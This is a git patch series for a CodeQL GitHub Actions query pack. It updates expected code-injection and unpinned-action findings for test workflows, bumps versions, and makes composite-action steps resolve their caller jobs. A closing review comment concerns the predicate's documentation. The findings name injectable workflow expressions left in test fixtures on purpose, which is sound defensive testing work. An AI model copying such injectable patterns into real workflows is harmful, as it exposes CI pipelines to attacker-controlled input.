| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | 
@@ -411,6 +464,9 @@ subpaths | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 75b64cea3e5..3ad4e6915d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input 
title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | 
.github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -387,6 +435,8 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 008c3696789..6d56b99407e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -19,12 +19,12 @@ | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | 
.github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned 
commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | From 0d55b4e784117431fd8be4c510a11975d857b5e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:59:10 +0200 Subject: [PATCH 0534/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84d4f5f3678..4c1252d976d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.51 +version: 0.1.52 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 0ef4c721e1a..a8c891b256a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.51 +version: 0.1.52 groups: [actions, queries] suites: codeql-suites extractor: javascript From 356c20015832da0d2bf43c6d5f90c7beef74d4ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:03:55 +0200 Subject: [PATCH 0535/1267] Composite Action steps's getEnclosingJob should return the calling job --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d1c7718d77b..7659661bdac 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -105,7 +105,10 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets the enclosing Job. */ - JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + JobImpl getEnclosingJob() { + result.getAChildNode*() = this.getParentNode() or + result = this.getEnclosingCompositeAction().getACallerJob() + } /** * Gets the enclosing workflow if any. 
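Review bot: The doc comment kept above `getEnclosingJob()` in the Ast.qll hunk still reads "Gets the enclosing Job.", but the added disjunct `result = this.getEnclosingCompositeAction().getACallerJob()` means a node inside a composite action now yields every job that calls that action, so the predicate can have several results. Queries that use the enclosing job to decide whether a step runs in a privileged or externally triggerable context will then presumably be evaluated once per caller job, and a composite action with no resolvable caller would still seem to have no enclosing job. I would state that contract in the comment, e.g. `* Gets the enclosing Job; for a node inside a composite action, gets each job that calls the action.`, and re-check callers that assume a single result. The `AstNodeImpl` class starts and ends outside the hunk.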
